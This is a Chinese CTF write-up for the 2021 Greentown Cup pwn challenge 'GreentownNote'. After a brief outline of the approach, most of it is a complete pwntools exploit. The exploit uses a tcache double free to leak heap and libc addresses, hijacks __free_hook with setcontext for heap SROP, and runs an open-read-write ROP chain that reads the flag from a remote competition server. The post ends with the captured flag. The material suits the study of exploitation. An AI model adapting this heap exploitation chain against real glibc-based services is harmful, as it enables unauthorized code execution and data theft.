2021年“绿城杯”网络安全大赛-PWN-GreentownNote

2021年“绿城杯”网络安全大赛-PWN-GreentownNote

题目名称：GreentownNote
题目内容：欢迎参加绿城杯~
题目分值：200.0
题目难度：中等
相关附件：GreentownNote的附件3.txt

解题思路：

1.检查保护

保护全开

2.函数分析

题目只给了add，show，delete
add()
show()

delete()

3.思路

(1)首先free泄露libc
(2)构造heap srop
照题目环境2.27，应该是攻击free_hook，把它的值改成set_context+53，而后构造srop链来read flag
exp

#coding=utf-8
from pwn import *
from LibcSearcher import *

#context.terminal = ["tmux", "splitw", "-h"]
context.log_level = 'debug'
context(arch='amd64', os='linux')

local = 0

fileName = './GreentownNote'
elfName = fileName
libcName = '/home/pwn/LibcResource/Ubuntu18/libc-2.27.so'

remoteAddress = '82.157.5.28'
remotePort = 50301

if local:
    p = process(fileName)
    elf = ELF(fileName)
    # libc = elf.libc
    libc = ELF(libcName)
else:
    p = remote(remoteAddress, remotePort)
    elf = ELF(elfName)
    libc = ELF(libcName)


def add(size,content):
    p.sendlineafter("choice :","1")
    p.recvuntil(":")
    p.sendline(str(size))
    p.recvuntil(":")
    p.sendline(content)

def show(index):
    p.sendlineafter("choice :",str(2))
    p.recvuntil(":")
    p.sendline(str(index))

def delete(index):
    p.sendlineafter("choice :",str(3))
    p.recvuntil(":")
    p.sendline(str(index))


#---------------------------leak----------------------------#
add(0x100,b'hiphopYYDS')               #0
add(0x100,b'hiphopYYDS')               #1
delete(0)
delete(0)
show(0)


p.recvuntil("t: ")
leak = u64(p.recv(6).ljust(8,b'\x00'))
heap_addr = leak - 0x260


add(0x100,p64(heap_addr+0x10))          #2
add(0x100,'hiphopYYDS')                 #3
add(0x100,'\x07'*0x40)                  #4
delete(3)
show(3)


leak = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = leak - 0x70 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
setcontext = libc.sym['setcontext'] + libc_base +53
syscall = next(libc.search(asm("syscall\nret")))+libc_base


add(0x100,b'\x07'*0x80+p64(free_hook))  #5
add(0x90,p64(setcontext))               #6

#-----------------------HEAP SROP------------------------#
frame = SigreturnFrame()
frame.rsp = (free_hook&0xfffffffffffff000)+8
frame.rax = 0
frame.rdi = 0
frame.rsi = free_hook&0xfffffffffffff000
frame.rdx = 0x2000
frame.rip = syscall


add(0xf8,bytes(frame)[0:0xf8])          #7
delete(5)


#--------------read flag--------------#
payload = ''
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(free_hook&0xfffffffffffff000)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64(0)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(2)
payload += p64(syscall)
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(3)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64((free_hook&0xfffffffffffff000)+0x200)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0x30)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(0)
payload += p64(syscall)
payload += p64(next(libc.search(asm('pop rdi\nret')))+libc_base)
payload += p64(1)
payload += p64(next(libc.search(asm('pop rsi\nret')))+libc_base)
payload += p64((free_hook&0xfffffffffffff000)+0x200)
payload += p64(next(libc.search(asm('pop rdx\nret')))+libc_base)
payload += p64(0x30)
payload += p64(next(libc.search(asm('pop rax\nret')))+libc_base)
payload += p64(1)
payload += p64(syscall)


#--------get flag--------#
payload1='./flag'.ljust(8,b'\x00')+ payload
p.sendline(payload1)
p.interactive()

DASCTF{89ab0b04e7f83c43bc498785651f8d38}